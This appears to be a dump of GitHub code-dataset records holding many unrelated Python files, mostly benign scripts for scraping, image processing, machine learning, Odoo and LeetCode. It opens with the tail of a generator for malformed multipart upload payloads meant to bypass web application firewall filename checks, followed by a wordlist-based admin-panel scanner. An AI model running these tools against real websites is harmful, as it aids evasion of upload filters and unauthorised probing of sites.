b'''\\r\r\n\\r\r\n''' + content + b'''\\r\r\n--''' + boundary,#\r\nb'''Content-Type: multipart/form-data bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bfWebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9boundary=--''' + boundary + b'''\\r\r\n\\r\r\n--''' + boundary + b'''\\r\r\nContent-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"\\r\r\nContent-Type: ''' + Content_Type + b'''\\r\r\n\\r\r\n''' + content + b'''\\r\r\n--''' + boundary,#\r\nb'''Content-Type: multipart/form-data; boundary=''' + boundary + b'''\\r\r\n\\r\r\n--''' + boundary + b'''\\r\r\nContent-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"\\r\r\n\\r\r\n\\r\r\n''' + content + b'''\\r\r\n--''' + boundary,#\r\nb'''Content-Type: multipart/form-data; boundary=\"\"''' + boundary + b'''\"\\r\r\n\\r\r\n--\\r\r\nContent-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"\\r\r\nContent-Type: ''' + Content_Type + b'''\\r\r\n\\r\r\n''' + content + b'''\\r\r\n--\"\"''' + boundary + b'''\"''',#\r\nb'''Content-Type: multipart/form-data; boundary= \"''' + boundary + b'''\" \\r\r\n\\r\r\n-- \"''' + boundary + b'''\"\\r\r\nContent-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"\\r\r\nContent-Type: ''' + Content_Type + b'''\\r\r\n\\r\r\n''' + content + b'''\\r\r\n-- \"''' + boundary + b'''\"''',#\r\nb'''Content-Type : multipart/form-data; boundary=--b\\r\r\nContent-Type: multipart/form-data; boundary=''' + boundary + b'''\\r\r\n\\r\r\n--b\\r\r\nContent-Disposition: form-data; name=\"''' + name + b'''\";\\r\r\nContent-Type: ''' + Content_Type + b'''\\r\r\n\\r\r\n1\\r\r\n--''' + boundary + b'''\\r\r\nContent-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"\\r\r\nContent-Type: ''' + Content_Type + b'''\\r\r\n\\r\r\n''' + content + b'''\\r\r\n--''' + boundary + b'''--\\r\r\n--b''',#\r\nb'''Content-Type: multipart/form-data; aboundary=''' + boundary + b''';boundary=b;\\r\r\n\\r\r\n--b\\r\r\nContent-Disposition: form-data; name=\"''' + name + b'''\";\\r\r\nContent-Type: ''' + Content_Type + b'''\\r\r\n\\r\r\n1\\r\r\n--''' + boundary + b'''\\r\r\nContent-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"\\r\r\nContent-Type: ''' + Content_Type + b'''\\r\r\n\\r\r\n''' + content + b'''\\r\r\n--''' + boundary + b'''--\\r\r\n--b''',#\r\nb'''Content-Type: multipart/form-data; boundary=boundary=''' + boundary + b'''\\r\r\n\\r\r\n--''' + boundary + b'''\\r\r\nContent-Disposition: form-data; name=\"''' + name + b'''\";\\r\r\nContent-Type: ''' + Content_Type + b'''\\r\r\n\\r\r\n1\\r\r\n--boundary=''' + boundary + b'''\\r\r\nContent-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"\\r\r\nContent-Type: ''' + Content_Type + b'''\\r\r\n\\r\r\n''' + content + b'''\\r\r\n--boundary=''' + boundary + b'''--\\r\r\n--''' + boundary,#\r\nb'''Content-Type: multipart/form-data; boundary=''' + boundary + b'''\\r\r\n\\r\r\n--''' + boundary + b'''\\r\r\nContent-Disposition: form-data; name=\\'''' + name + b'''\\'''' + name + b'''\";\\r\r\nContent-Type: ''' + Content_Type + b'''\\r\r\n\\r\r\n1\\r\r\n--''' + boundary + b'''\\r\r\nContent-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"\\r\r\nContent-Type: ''' + Content_Type + b'''\\r\r\n\\r\r\n''' + content + b'''\\r\r\n--''' + boundary,#\r\nb'''Content-Type: multipart/form-data; boundary=''' + boundary + b'''\\r\r\n\\r\r\n--''' + boundary + b'''\\r\r\nContent-Disposition: form-data; name=\"''' + name + b''']\";\\r\r\nContent-Type: ''' + Content_Type + b'''\\r\r\n\\r\r\n1\\r\r\n--''' + boundary + b'''\\r\r\nContent-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"\\r\r\nContent-Type: ''' + Content_Type + b'''\\r\r\n\\r\r\n''' + content + b'''\\r\r\n--''' + boundary,#\r\n ]\r\n##################################################################################################\r\nfor i in Content_Disposition_list:\r\n payloads.append(generate(Content_Disposition = i))\r\n\r\nfor i in Content_Type1_list:\r\n payloads.append(generate(Content_Type1 = i))\r\n\r\nfor i in Content_Type2_list:\r\n payloads.append(generate(Content_Type2 = i))\r\n\r\nfor i in other_list:\r\n payloads.append(generate_other(body = i))\r\n\r\npayloads_string = ''\r\nfor i in payloads:\r\n payloads_string += i.decode('utf8')+'\\n'\r\n\r\npyperclip.copy(payloads_string)\r\n\r\n","repo_name":"maybe-why-not/upload_waf_filename_bypass","sub_path":"upload_waf_filename_bypass.py","file_name":"upload_waf_filename_bypass.py","file_ext":"py","file_size_in_byte":21776,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"39004980133","text":"# pip install requests\nimport requests\n# pip install colorama\nfrom colorama import init\nfrom colorama import Fore as c \nfrom colorama import Style as s\n\nimport json\n\ninit()\n\nclass LoAd :\n def __init__(self, url):\n self.session = requests.Session()\n try:\n if self.session.get(\"https://\"+url).status_code != 200:\n raise \n except :\n raise Exception(\"Invalid URL\")\n self.url = url\n self.words = []\n self.possible = {}\n self.include_wordlist()\n try : \n self.checker()\n print(c.GREEN + \"Done\" + c.RESET)\n except KeyboardInterrupt:\n print(c.RED + \"\\n Exiting...\" + c.RESET)\n print(c.GREEN + \"Possible Admin Panels :\" + c.RESET)\n for u,s in self.possible.items():\n print(f\"{c.GREEN}{u} {c.YELLOW}>>> {c.BLUE}{s} \")\n if input(f\"{c.RED}Do You Want To Save The Results [y/N] ? {c.RESET}\").upper() == \"Y\":\n with open(f\"{self.url}.results.json\", 'w') as f:\n json.dump(self.possible, f)\n print(f\"{c.GREEN}Results Saved To {self.url}.results.json\")\n exit()\n \n def checker(self):\n for ind , word in enumerate(self.words):\n url = f\"https://{self.url}/{word}\"\n r = self.session.get(url).status_code\n if r != 404:\n print(f\"{c.GREEN }Possible Admin Panel : {c.RED}{url}{c.RESET}\")\n self.possible[url] = r\n else:\n print(f\"{c.BLUE}Try : {c.YELLOW} {ind+1} {c.RED}FAILED{c.RESET}\")\n\n def include_wordlist(self):\n try :\n with open(\"wordlist.txt\", 'r') as f:\n [ self.words.append(line.strip()) for line in f ]\n except:\n raise Exception(\"Wordlist not found\")\n print(c.GREEN + \"Wordlist loaded\" + c.RESET)\n print(c.GREEN + \"Total words: \" + str(len(self.words)) + c.RESET)\nif __name__ == \"__main__\":\n url = input(\"Enter the url: \")\n main = LoAd(url)\n\n\n","repo_name":"shervin1385/locate-admin","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"26306210927","text":"# -*- coding: utf-8 -*-\nimport collections\nimport datetime\nimport requests, execjs, json\nimport time\nimport wordcloud\nimport jieba\nimport PIL.Image as image\nimport numpy as np\nimport matplotlib.pyplot as plt # 图像展示库\n\n\ndef get_comments(song_id): # 获取 2020-09-16 --- 2020-08-27的评论信息\n headers = {\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36',\n 'accept': '*/*',\n }\n\n with open('code.js', encoding='utf8') as f1:\n js = f1.read()\n js_tool = execjs.compile(js) #加密函数,上一篇里有提到\n\n now_day = datetime.date.today() #当天日期\n flag_info = None #重复评论标志\n num = 0\n for i in range(20, -1, -1): # 获取 2020-08-27---2020-09-16 的日期\n pre_day = str(now_day - datetime.timedelta(days=i)) + ' 23:59:59' # 获取T+1日期\n # 先转换为时间数组\n timeArray = time.strptime(pre_day, \"%Y-%m-%d %H:%M:%S\")\n # 转换为时间戳\n cursor = str(int(time.mktime(timeArray))) + '000' # 拼接成13位时间戳\n print(pre_day, cursor)\n # 评论接口参数\n param = {\"rid\": \"R_SO_4_\" + song_id, \"threadId\": \"R_SO_4_\" + song_id, \"pageNo\": \"1\", \"pageSize\": \"1000\",\n \"cursor\": cursor, \"offset\": \"0\", \"orderType\": \"1\", \"csrf_token\": \"ff57cff46ebe79b9a51dd10f8c9181bb\"}\n pdata = js_tool.call('d', str(param))\n response = requests.post('https://music.163.com/weapi/comment/resource/comments/get', headers=headers,data=pdata)\n # 获取评论信息\n data = json.loads(response.text)['data']\n comments = data.get('comments')\n # 存储评论信息\n with open('comments.txt', 'a', encoding='utf8') as f:\n for comment in comments:\n info = comment.get('content')\n if flag_info == info: # 取到重复的评论则跳出循环,防止重复获取\n break\n print(info)\n f.write(info + '\\n')\n # folow_comments = comment.get('beReplied') # 附加的评论,暂不获取\n # if folow_comments:\n # for folow_comment in folow_comments:\n # print(folow_comment.get('content'))\n num += 1 # 获取评论数+1\n flag_info = comments[0]['content'] # 取每次请求的第一条\n print('每次请求的第一条', flag_info, '\\n')\n print('获取评论数:', num)\n\n\n# 分词\ndef fc_CN(text):\n # 接收分词的字符串\n word_list = jieba.cut(text)\n # 分词后在单独个体之间加上空格\n result = \" \".join(word_list)\n return result\n\n# 输出云词\ndef word_cloud():\n with open(\"./comments.txt\", encoding='utf8') as fp:\n text = fp.read()\n # 将读取的中文文档进行分词\n text = fc_CN(text).replace('\\n', '').split(' ')\n # 过滤部分分词\n filter_str = ['的', ',', '了', '我', '[', '你', '是', '就', ']', '!', '。', '?', '这', '不', '也', '都', '吧', '啊', '在',\n '吗', '和', '吗', '听', '有', '说', '去', '好', '人', '给', '他', '…', '小', '来', '还', '没', '一', '']\n new_text = []\n for data in text:\n if data not in filter_str:\n new_text.append(data)\n print(new_text)\n # 词频统计\n word_counts = collections.Counter(new_text) # 对分词做词频统计\n word_counts_top10 = word_counts.most_common(10) # 获取前10最高频的词\n print(word_counts_top10) # 输出检查\n\n # 词频展示\n mask = np.array(image.open('./love.jpg')) # 定义词频背景\n wc = wordcloud.WordCloud(\n # background_color='white', # 设置背景颜色\n font_path='C:\\Windows\\Fonts\\simhei.TTF', # 设置字体格式\n mask=mask, # 设置背景图\n max_words=200, # 最多显示词数\n max_font_size=300, # 字体最大值\n # scale=32 # 调整图片清晰度,值越大越清楚\n )\n\n wc.generate_from_frequencies(word_counts) # 从字典生成词云\n image_colors = wordcloud.ImageColorGenerator(mask) # 从背景图建立颜色方案\n wc.recolor(color_func=image_colors) # 将词云颜色设置为背景图方案\n wc.to_file(\"./temp.jpg\") # 将图片输出为文件\n plt.imshow(wc) # 显示词云\n plt.axis('off') # 关闭坐标轴\n plt.show() # 显示图像\n\n\nif __name__ == '__main__':\n # 歌曲id\n song_id = '1474342935'\n get_comments(song_id)\n word_cloud()\n","repo_name":"934050259/wyy_comments","sub_path":"wyy_comment.py","file_name":"wyy_comment.py","file_ext":"py","file_size_in_byte":4683,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"2133292707","text":"from particle_object import Particle\n\n# Colors\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\n\n# Constants\nWINDOWS_WIDTH = 1100\nWINDOWS_HEIGHT = 700\nSPRITE_FOLDER_ROUTE = '../sprites/'\n\n# Constants for WorldObject class\nCOLORKEY = RED\nSTART_VX = 0\nSTART_VY = -2\nSIZE_X = 291\nSIZE_Y = 154\nGRAVITY = False\n\n\nclass PlayerGhost(Particle): # Players angel ghost particle class\n\n def __init__(self, x, y, object_id, character):\n super().__init__(character + '_angel', COLORKEY, x, y, SIZE_X, SIZE_Y, START_VX, START_VY, GRAVITY,\n object_id)\n self.character = character\n # End __init__\n","repo_name":"linkmanrs/cubix","sub_path":"code/cuby_angel.py","file_name":"cuby_angel.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43545874857","text":"import cv2 as cv\nimport numpy as np\n\nimg = cv.imread(\"Resources/test.jpg\")\n\nimgHor= np.hstack((img,img))\nimgVer= np.vstack((img,img))\n\ncv.imshow(\"Horizontal img\",imgHor)\ncv.imshow(\"vertical img\",imgVer)\n\ncv.waitKey(0)","repo_name":"KrishnenduDakshi2002/Python-learning","sub_path":"opencv/join_img.py","file_name":"join_img.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36315337842","text":"'''\n给定一个正整数,输出它的补数。补数是对该数的二进制表示取反。\n\n注意:\n给定的整数保证在32位带符号整数的范围内。\n你可以假定二进制数不包含前导零位。\n\n示例 1:\n输入: 5\n输出: 2\n解释: 5的二进制表示为101(没有前导零位),其补数为010。所以你需要输出2。\n\n示例 2:\n输入: 1\n输出: 0\n解释: 1的二进制表示为1(没有前导零位),其补数为0。所以你需要输出0。\n'''\n\nclass Solution:\n def findComplement(self, num: int) -> int:\n binary=bin(num)\n binary2='0b'\n for i in binary[2:]:\n if i=='0':\n binary2=binary2+'1'\n else :\n binary2=binary2+'0'\n return int(binary2,2)\n\n'''\n执行用时 : 52 ms, 在Number Complement的Python3提交中击败了84.16% 的用户\n内存消耗 : 13.1 MB, 在Number Complement的Python3提交中击败了61.29% 的用户\n'''\n\nclass Solution:\n def findComplement(self, num: int) -> int:\n return int(bin(num)[2:].replace('0', '2').replace('1', '0').replace('2', '1'), 2)","repo_name":"GuocaiL/AlgorithmExe","sub_path":"leetcode/Number_Complement_476.py","file_name":"Number_Complement_476.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"109831535","text":"from keras.layers import Dense, Flatten\nfrom keras.layers.recurrent import LSTM, GRU\nfrom keras.models import Sequential, Model\nfrom keras.optimizers import Adam, RMSprop\nfrom keras.layers.wrappers import TimeDistributed\nfrom keras.layers import Conv2D, MaxPooling3D, Conv3D, MaxPooling2D, Activation, Input\nfrom keras import backend as K\nfrom sequence_generator import DataGenerator\nfrom keras.regularizers import l2\nfrom keras.layers.normalization import BatchNormalization\n\nimport os\nimport matplotlib.pyplot as plt\n\n############## Globals #############\n# Defines the global variables for #\n# batch size, epochs and classes #\n####################################\n\nBATCH = 18\nEPOCH = 1\nCLASSES = 3\nSEQ_LEN = 8\nTRAIN_DIR = os.path.abspath('../data/train')\nVAL_DIR = os.path.abspath('../data/val')\n\n########### End Globals ############\n\nclass CNN_LSTM():\n\n\t@staticmethod\n\tdef build_model(ip_shape, nb_classes):\n\t\tdef add_block(model, num_filters, kernel_dim, init, reg, padding='valid'):\n\t\t\tx = TimeDistributed(Conv2D(num_filters,\n\t\t\t kernel_size=kernel_dim,\n\t\t\t padding=padding,\n\t\t\t kernel_initializer=init,\n\t\t\t kernel_regularizer=l2(reg)))(model)\n\t\t\tx = TimeDistributed(BatchNormalization())(x)\n\t\t\tx = TimeDistributed(Activation('relu'))(x)\n\t\t\treturn x\n\n\t\tinitialiser = 'glorot_uniform'\n\t\treg_lambda = 0.001\n\n\t\tinput = Input(shape=ip_shape)\n\t\t# input2 = Input(shape=ip_shape)\n\n\t\tb1 = add_block(input, 32, 7, initialiser, reg_lambda, 'same')\n\t\tb2 = add_block(b1, 32, 3, initialiser, reg_lambda)\n\t\tpool1 = TimeDistributed(MaxPooling2D((2, 2), strides=2))(b2)\n\n\t\tb3 = add_block(pool1, 64, 3, initialiser, reg_lambda, 'same')\n\t\tb4 = add_block(b3, 64, 3, initialiser, reg_lambda, 'same')\n\t\tpool2 = TimeDistributed(MaxPooling2D((2, 2), strides=2))(b4)\n\n\t\tb5 = add_block(pool2, 64, 3, initialiser, reg_lambda, 'same')\n\t\tb6 = add_block(b5, 64, 3, initialiser, reg_lambda, 'same')\n\t\tpool3 = TimeDistributed(MaxPooling2D((2, 2), strides=2))(b6)\n\n\t\tb7 = add_block(pool3, 64, 3, initialiser, reg_lambda, 'same')\n\t\tb8 = add_block(b7, 64, 3, initialiser, reg_lambda, 'same')\n\t\tpool4 = TimeDistributed(MaxPooling2D((2, 2), strides=2))(b8)\n\n\t\tb9 = add_block(pool4, 64, 3, initialiser, reg_lambda, 'same')\n\t\tb10 = add_block(b9, 64, 3, initialiser, reg_lambda, 'same')\n\t\tpool5 = TimeDistributed(MaxPooling2D((2, 2), strides=2))(b10)\n\n\t\t# LSTM output head\n\t\tflat = TimeDistributed(Flatten())(pool5)\n\n\t\tlstm = LSTM(256, return_sequences=False, dropout=0.5)(flat)\n\t\t# gru = GRU(256, return_sequences=False,dropout=0.5)(flat)\n\t\toutput = Dense(nb_classes, activation='softmax')(lstm)\n\n\t\tmodel = Model(inputs=input, outputs=output)\n\n\t\treturn model\n\ndef train():\n\tif K.backend() == 'tensorflow':\n\t\tK.common.set_image_dim_ordering(\"th\")\n\n\tif K.image_data_format() == 'channels_first':\n\t\tIP_SHAPE = (SEQ_LEN, 3, 224, 224)\n\telse:\n\t\tIP_SHAPE = (SEQ_LEN, 224, 224, 3)\n\n\ttr_data_gen = DataGenerator('../data', SEQ_LEN, 'train', BATCH, (224, 224))\n\tnum_train = tr_data_gen.__len__()\n\n\tval_data_gen = DataGenerator('../data', SEQ_LEN, 'val', BATCH, (224, 224))\n\tnum_val = val_data_gen.__len__()\n\n\tmodel = CNN_LSTM().build_model(IP_SHAPE, CLASSES)\n\tmodel.summary()\n\t# Now compile the network.\n\toptimizer = Adam(lr=1e-5, decay=1e-6)\n\tmodel.compile(loss='categorical_crossentropy', optimizer=Adam, metrics=['accuracy'])\n\n\thistory = model.fit_generator(generator=tr_data_gen,\n\t steps_per_epoch=num_train // BATCH,\n\t validation_data=val_data_gen,\n\t validation_steps=num_val,\n\t epochs=EPOCH, verbose=1, workers=4\n\t )\n\n\tscore = model.evaluate()\n\tprint(\"Test Loss: \", score[0])\n\tprint(\"Test accuracy: \", score[1] * 100)\n\tplt.plot(history.history['acc'],\n\t label='Train Accuracy', color='red')\n\tplt.plot(history.history['val_acc'],\n\t label='Validation Accuracy')\n\tplt.title('Accuracy of training and validation')\n\tplt.legend()\n\ntrain()\n","repo_name":"raviabhiram/monitoring-people-using-deep-learning","sub_path":"src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39727732026","text":"from hashlib import md5\r\nfrom time import localtime\r\nfrom app.error_codes import ERRORS_DESCRIPTION, ERRORS_STATUS_CODE\r\n\r\ndef JSONResponse(data=None, message=None, code=None, status=200):\r\n\r\n\tif (not message and code) and code in ERRORS_DESCRIPTION:\r\n\t\tmessage = ERRORS_DESCRIPTION.get(code,\"\")\r\n\r\n\tif code and code in ERRORS_STATUS_CODE:\r\n\t\tstatus = ERRORS_STATUS_CODE.get(code)\r\n\r\n\tif code or status not in [200, 201]:\r\n\t\treturn {\r\n\t\t\t\"code\": code,\r\n\t\t\t\"message\": message,\r\n\t\t\t\"status\": status,\r\n\t\t\t\"data\":data\r\n\t\t}, status\r\n\telse:\r\n\t\treturn data\r\n\r\ndef get_public_id(unique_id):\r\n\treturn md5(str(unique_id).encode(\"UTF-8\")).hexdigest()\r\n\r\n","repo_name":"keosariel/Linktree-API","sub_path":"app/utils/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"72565777474","text":"'''\n\nDescription:\n\nGiven an integer n. Each number from 1 to n is grouped according to the sum of its digits. \n\nReturn how many groups have the largest size.\n\n \n\nExample 1:\n\nInput: n = 13\nOutput: 4\nExplanation: There are 9 groups in total, they are grouped according sum of its digits of numbers from 1 to 13:\n[1,10], [2,11], [3,12], [4,13], [5], [6], [7], [8], [9]. There are 4 groups with largest size.\n\n\n\nExample 2:\n\nInput: n = 2\nOutput: 2\nExplanation: There are 2 groups [1], [2] of size 1.\n\n\n\nExample 3:\n\nInput: n = 15\nOutput: 6\n\n\n\nExample 4:\n\nInput: n = 24\nOutput: 5\n \n\nConstraints:\n\n1 <= n <= 10^4\n\n'''\n\n\n\nfrom collections import defaultdict\n\nclass Solution:\n \n def digitsum( self, x ):\n \n s = 0\n \n while x:\n q, r = divmod( x, 10)\n s += r\n x = q\n \n return s\n \n \n \n def countLargestGroup(self, n: int) -> int:\n \n digitsum_num_dict = defaultdict( list )\n \n for number in range(1,n+1):\n \n digit_sum = self.digitsum( number )\n \n digitsum_num_dict[digit_sum].append( number )\n \n \n max_size, max_grp_cnt = 0, 0\n \n for digitsum in digitsum_num_dict:\n \n cur_size = len( digitsum_num_dict[digitsum] )\n if cur_size > max_size:\n max_size = cur_size\n max_grp_cnt = 1\n \n elif cur_size == max_size:\n max_grp_cnt += 1\n \n \n return max_grp_cnt\n\n\n\n# n : the value of input\n\n## Time Complexity: O( n )\n#\n# The overhead in time is the cost of loop, which is of O( n ).\n\n## Space Complexity: O( n )\n#\n# The overhead in space is the storage for dictionary, digitsum_num_dict, which is of o( n ).\n\n\nfrom collections import namedtuple\nTestEntry = namedtuple('TestEntry', 'n')\ndef test_bench():\n\n test_data = [\n TestEntry( n = 13),\n TestEntry( n = 2),\n TestEntry( n = 15),\n TestEntry( n = 24),\n TestEntry( n = 1),\n TestEntry( n = 1000),\n ]\n\n # expected output:\n '''\n 4\n 2\n 6\n 5\n 1\n 2\n '''\n for t in test_data:\n print( Solution().countLargestGroup( n = t.n ) )\n\n return\n\n\n\nif __name__ == '__main__':\n\n test_bench()","repo_name":"brianchiang-tw/leetcode","sub_path":"No_1399_Count Largest Group/by_dictionary.py","file_name":"by_dictionary.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"61"} +{"seq_id":"10234289446","text":"# -*- coding: utf-8 -*-\nfrom openerp import fields, models\n\n\nclass res_company(models.Model):\n _inherit = \"res.company\"\n\n responsability_id = fields.Many2one(\n related='partner_id.responsability_id',\n relation='sii.responsability',\n string=\"Responsability\",)\n start_date = fields.Date(\n related='partner_id.start_date',\n string='Start-up Date',)\n invoice_vat_discrimination_default = fields.Selection(\n [('no_discriminate_default', 'Yes, No Discriminate Default'),\n ('discriminate_default', 'Yes, Discriminate Default')],\n 'Invoice VAT discrimination default',\n default='no_discriminate_default',\n required=True,\n help=\"\"\"Define behaviour on invoices reports. Discrimination or not \\\n will depend in partner and company responsability and SII letters\\\n setup:\n * If No Discriminate Default, if no match found it won't \\\n discriminate by default.\n * If Discriminate Default, if no match found it would \\\n discriminate by default.\n \"\"\")\n tp_sii_code = fields.Char(\n 'Tax Payer SII Code', related='partner_id.tp_sii_code', readonly=True)\n\n","repo_name":"odoo-chile/l10n_cl_invoice","sub_path":"models/company.py","file_name":"company.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"2850032443","text":"from residual_optimization.envs.sine_collision_stiffness_estimator_env import SineCollisionStiffnessEstimator\nfrom residual_optimization.controllers.admittance_controller_1d import AdmittanceController1D\nimport numpy as np\n\nimport matplotlib.pyplot as plt\nimport cvxpy as cp\n\nsolvers = ['OSQP', 'ECOS', 'SCS']\nsolver_durations = []\n\n# Plot variables\nfig = plt.figure()\nlinewidth = 0.7\n\nfor solver in solvers:\n np.random.seed(42)\n\n # Gym environment\n env = SineCollisionStiffnessEstimator(\n testing=False,\n alpha=0.1,\n beta=10,\n time_start=1,\n time_stop=5,\n K_e_tilde_std=500,\n dt=0.01,\n solver=solver\n )\n\n # Trajectory definitions\n time = env.time\n num_samples = len(time)\n x_d = env.x_d\n f_d = env.f_d\n x_c = np.zeros_like(x_d, dtype=np.float64)\n x_e = np.zeros_like(x_d, dtype=np.float64)\n f_e = np.zeros_like(f_d, dtype=np.float64)\n u_h = np.zeros_like(f_d, dtype=np.float64)\n u_r = np.zeros_like(f_d, dtype=np.float64)\n u = np.zeros_like(f_d, dtype=np.float64)\n\n # Visualization\n obs = env.reset()\n for t in range(len(time)):\n obs, info = env.step()\n \n # Add to plot\n x_c[t] = info['x_o']\n x_e[t] = info['x_e']\n u_h[t] = info['u_h']\n u_r[t] = info['u_r']\n u[t] = info['u']\n f_e[t] = info['f_e']\n\n nonzero_indexes = np.nonzero(env.residual_controller_durations)\n nonzero_residual_controller_durations = env.residual_controller_durations[nonzero_indexes]\n print(f'[INFO] Solver: {solver}')\n print('[INFO] Avg duration for residual controller: {:.4f}'.format(nonzero_residual_controller_durations.mean()))\n print('[INFO] Std duration for residual controller: {:.4f}'.format(nonzero_residual_controller_durations.std()))\n print('[INFO] Max duration for residual controller: {:.4f}'.format(nonzero_residual_controller_durations.max()))\n print('[INFO] Min duration for residual controller: {:.4f}'.format(nonzero_residual_controller_durations.min()))\n \n plt.plot(time, env.residual_controller_durations[:-1], linestyle='-', label=solver, linewidth=linewidth)\n\nplt.ylabel('sec / iteration')\nplt.xlabel('Time (sec)')\nplt.legend()\nplt.xlabel(f\"Benchmark over {num_samples} iterations\") \nplt.show()\n","repo_name":"bglima/residual-optimization-gym","sub_path":"tests/test_durations_plot_combined.py","file_name":"test_durations_plot_combined.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25447156734","text":"import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\n\n\ndef k_means(img, K, text):\n vectorized = img.reshape((-1, 3))\n vectorized = np.float32(vectorized)\n\n criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)\n\n attempts = 10\n ret, label, center = cv2.kmeans(vectorized, K, None, criteria, attempts, cv2.KMEANS_PP_CENTERS)\n\n center = np.uint8(center)\n res = center[label.flatten()]\n result_image = res.reshape(img.shape)\n\n edges = cv2.Canny(result_image, 1, 1)\n return edges\n\n\noriginal_image = cv2.imread(\"panda.jpg\")\nimg_0 = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)\n\nK = 20\nn = 8\n\nkernel = np.ones((5, 5), np.uint8) / 25\nimg = cv2.filter2D(img_0, -1, kernel)\nfor i in range(n):\n img = cv2.filter2D(img, -1, kernel)\nres_img1 = k_means(img, K, 'Segmented Image - filter2D')\n\nimg = cv2.bilateralFilter(img_0,9,75,75)\nfor i in range(n):\n img = cv2.bilateralFilter(img,9,75,75)\nres_img2 = k_means(img, K, 'Segmented Image - bilateralFilter')\n\nimg = cv2.medianBlur(img_0, 5)\nfor i in range(n):\n img = cv2.medianBlur(img, 5)\nres_img3 = k_means(img, K, 'Segmented Image - medianBlur')\n\nimg = cv2.GaussianBlur(img_0,(5,5),0)\nfor i in range(n):\n img = cv2.GaussianBlur(img,(5,5),0)\nres_img4 = k_means(img, K, 'Segmented Image - GaussianBlur')\n\nfigure_size = 15\n\nplt.figure(figsize=(figure_size, figure_size))\nplt.subplot(2, 3, 5), plt.imshow(res_img1, cmap='gray_r')\nplt.title('Segmented Image - filter2D'), plt.xticks([]), plt.yticks([])\nplt.subplot(2, 3, 2), plt.imshow(res_img2, cmap='gray_r')\nplt.title('Segmented Image - bilateralFilter'), plt.xticks([]), plt.yticks([])\nplt.subplot(2, 3, 3), plt.imshow(res_img3, cmap='gray_r')\nplt.title('Segmented Image - medianBlur'), plt.xticks([]), plt.yticks([])\nplt.subplot(2, 3, 4), plt.imshow(res_img4, cmap='gray_r')\nplt.title('Segmented Image - GaussianBlur'), plt.xticks([]), plt.yticks([])\nplt.subplot(2, 3, 1), plt.imshow(img_0, cmap='gray_r')\nplt.title('Original'), plt.xticks([]), plt.yticks([])\n\nplt.show()\n","repo_name":"sabwally/ColoringBook","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"30129274023","text":"\"\"\"\r\nprojekt_1.py: první projekt do Engeto Online Python Akademie\r\nauthor: Adam Kušnir\r\nemail: adamkushnir@outlook.cz\r\ndiscord: Adam K. ASYPRO_AK#2480\r\n\"\"\"\r\ntext = {1: '''\r\nSituated about 10 miles west of Kemmerer,\r\nFossil Butte is a ruggedly impressive\r\ntopographic feature that rises sharply\r\nsome 1000 feet above Twin Creek Valley\r\nto an elevation of more than 7500 feet\r\nabove sea level. The butte is located just\r\nnorth of US 30N and the Union Pacific Railroad,\r\nwhich traverse the valley. ''',\r\n2: '''At the base of Fossil Butte are the bright\r\nred, purple, yellow and gray beds 